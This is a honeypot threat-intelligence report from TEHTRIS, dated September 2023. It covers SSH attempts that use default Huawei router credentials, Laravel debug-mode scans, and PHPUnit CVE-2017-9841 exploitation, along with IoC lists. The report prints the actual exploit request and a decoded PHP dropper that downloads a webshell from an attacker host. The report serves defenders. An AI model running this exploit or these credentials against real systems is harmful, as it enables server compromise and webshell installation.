CERTHoneypots

Our selection of alerts on honeypots: report 18 – September 2023

The following report consists of TEHTRIS observations on our honeypots to provide you with information on what is going on the Internet. Keeping track of trends and keeping an eye on what is actively scanned by threat actors in a reconnaissance phase allows to adjust the cybersecurity posture.

The following report focuses on logs from the past month.

Check out our previous report here.

SSH connection attempts using default Huawei routers

Default Huawei credentials and timeline

Out of over 125,000 attempts to open a SSH connection detected on our honeypots over the past couple of weeks, the 25th most used credentials caught our attention:

Logintelecomadmin
Passwordadmintelecom OR admin

These are default credentials for Huawei HG8245 routers. Indeed, alongside the commonly used root, admin or other default credentials that make up the top 10 often shared in our threat reports, this one stood out as it started to be used against our honeypots only in recent weeks with a peak on August 29th and on September 09th.

Figure 1 Timeline of SSH connection attempts using login telecomadmin

Figure 1 Timeline of SSH connection attempts using login telecomadmin

Source Ips and targeted honeypots

This connection attempts came from 14 IP addresses and targeted mainly Europe (98%) as well as Thai and Indonesian honeypots (2%).

Russian IP address 193.201.9[.]109 (AS49505 – OOO Network of data-centers Selectel) accounted for 3/4th of all attempts, and Russian IP addresses 31.41.244[.]61 and 31.41.244[.]62 from AS 57678 (Cat Technologies Co. Limited) accounted respectively for 10% of all detected activities using these credentials.

Two IP addresses are not yet flagged as malicious on VirusTotal and seldomly known from other public database: Russian 178.47.209[.]188 and Chinese 116.234.53[.]176.

IoCs

193.201.9[.]109103.108.6[.]104177.220.190[.]17365.20.214[.]245116.234.53[.]176
31.41.244[.]61103.133.218[.]14178.219.119[.]14391.130.46[.]17445.131.66[.]179
31.41.244[.]62116.110.25[.]82178.47.209[.]188116.98.173[.]154 

EvilEyes0 scanning for Laravel debug mode

TEHTRIS Cyber Intelligence Unit recently monitored the apparition of POST requests with headers containing the mention evileyes0 scanning for Laravel applications to find enabled debug mode which could disclose sensitive information such as database, passwords, application keys…  similarly to what is observed with Androxgh0st (see report 7).

These requests appeared in TEHTRIS Telemetry on August 19th, with a surge on September 13th coming from US IP address 44.211.25[.]78, then on the 16th and 17th coming from US IP address 52.42.121[.]40 – as shown on the graph below:

Figure 2 Timeline of POST requests with header evileyes0

Overall, 4 US IP addresses are carrying out the scans. Submissions on these IP addresses only started at the beginning of September, coinciding with the activity registered on TEHTRIS honeypots.

IoCs

  • 44.211.25[.]78
  • 52.42.121[.]40
  • 52.91.249[.]136
  • 45.63.111[.]208

Active PHP Unit CVE-2017-9841 exploit attempts

6 unique IP addresses targeted TEHTRIS honeypots all over the world to exploit CVE-2017-9841 (CVSS3.1 9.8) in PHP Unit – which allows remote attackers to execute arbitrary PHP code – to download a trojan PHP webshell.

Details of the GET request

The following is a sample of traffic related to these exploit attempts:

URL /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Raw data "<?php eval('?>'.base64_decode(<base64_encoded_payload>)); ?>"

Base 64 decode:

<?php
function adminer($url, $isi) {
	$fp = fopen($isi, "w");
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($ch, CURLOPT_FILE, $fp);
	return curl_exec($ch);
	curl_close($ch);
	fclose($fp);
	ob_flush();
	flush();
}
if(adminer("http[:]//tangible-drink[.]surge[.]sh/configx.txt","wpx.php")) {
	echo "Uname";
} else {
	echo "failed";
}
?>
URL http[:]//tangible-drink[.]surge[.]sh/configx.txt has been seen downloading wpx.php.txt

(sha256:

de1114a09cbab5ae9c1011ddd11719f15087cc29c8303da2e71d861b0594a1ba), a trojan webshell.

These exploit attempts are not unusual – we already mentioned similar traffic last year. However, the server and downloaded payload is different, showing how evolutive attackers’ infrastructures are and illustrating the importance of constantly updating our findings in real-time.

IoCs

20.168.54[.]147
185.254.37[.]231
172.174.161[.]24
191.96.31[.]25
79.110.48[.]143
5.161.46[.]72 
http[:]//tangible-drink[.]surge[.]sh/configx.txt

Want to learn more on this subject?

More insights on this research issued from the alerts on our worldwide honeypots network.

Subscribe to our bi-monthly threat intelligence newsletter

    CVE-2012-1472, affecting VMware vCenter Chargeback Manager

    Want to learn more on this subject?

    More insights on this research issued from the alerts on our worldwide honeypots network.

    Subscribe to our bi-monthly threat intelligence newsletter


      Information remain TEHTRIS sole property and reproduction is forbidden

      TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.

      No warranty and liability

      TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.